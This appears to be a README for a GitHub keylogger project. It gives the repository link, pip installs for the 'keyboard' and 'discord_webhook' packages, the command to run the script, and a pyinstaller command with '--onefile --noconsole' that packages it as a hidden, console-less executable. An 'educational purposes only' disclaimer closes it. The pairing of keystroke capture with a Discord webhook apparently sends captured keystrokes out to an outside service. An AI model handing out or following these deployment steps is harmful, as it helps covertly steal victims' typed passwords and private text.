https://github.com/rdxkeerthi/keylogger.git
pip install keyboard
pip install discord_webhook
pip install discord_webhook
To execute the script all you have to do is run:
python key.py
Now what if you want to turn this into an executable? You can do that with the pyinstaller library that was included in the requirements.txt file.
pyinstaller PATH_TO_SCRIPT --onefile --noconsole
I am not responsible for any of your actions. This GitHub repository is made for educational purposes only!!!